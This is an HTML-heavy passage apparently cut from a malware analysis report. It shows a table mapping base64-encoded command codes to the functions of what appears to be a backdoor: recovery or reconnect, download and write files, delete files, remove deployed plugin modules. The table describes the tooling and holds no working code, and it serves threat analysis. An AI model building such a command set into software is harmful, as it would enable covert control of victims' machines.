-webkit-nbsp-mode: normal !important;">Remove<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">all deployed<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">plugin</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>modules</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="13" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="765915831" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{108}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">UmVjb3Zlcnk=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="612644927" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{115}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Recovery</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1775383608" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{122}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Recovery<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">or reconnect routine</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="14" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1088016739" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{132}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SpellingErrorV2Themed SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; background-position: 0px 100%; background-repeat: repeat-x; background-image: var(--urlSpellingErrorV2,url(&quot;data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1IiBoZWlnaHQ9IjQiPjxnIGZpbGw9Im5vbmUiIGZpbGwtcnVsZT0iZXZlbm9kZCI+PHBhdGggc3Ryb2tlPSIjRUIwMDAwIiBkPSJNMCAzYzEuMjUgMCAxLjI1LTIgMi41LTJTMy43NSAzIDUgMyIvPjxwYXRoIGQ9Ik0wIDBoNXY0SDB6Ii8+PC9nPjwvc3ZnPg==&quot;)); border-bottom: 1px solid transparent; -webkit-nbsp-mode: normal !important;">RFc</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="932363735" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{139}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">DW</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="443976277" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{146}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Download and write file operations</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="15" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="445646778" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{154}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Rk0=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1057520593" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{161}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">FM</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1998297230" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{168}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">File management<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">operations</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>&#x2013;<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">delete</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">file</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="16" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="680869671" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{180}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">TE4=</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1823369733" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{187}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">LN</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1678244246" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{194}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Unknown</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559737&quot;:0,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="17" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1414433950" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{202}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SpellingErrorV2Themed SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; background-position: 0px 100%; background-repeat: repeat-x; background-image: var(--urlSpellingErrorV2,url(&quot;data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1IiBoZWlnaHQ9IjQiPjxnIGZpbGw9Im5vbmUiIGZpbGwtcnVsZT0iZXZlbm9kZCI+PHBhdGggc3Ryb2tlPSIjRUIwMDAwIiBkPSJNMCAzYzEuMjUgMCAxLjI1LTIgMi41LTJTMy43NSAzIDUgMyIvPjxwYXRoIGQ9Ik0wIDBoNXY0SDB6Ii8+PC9nPjwvc3ZnPg==&quot;)); border-bottom: 1px solid transparent; -webkit-nbsp-mode: normal !important;">TXNn</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, 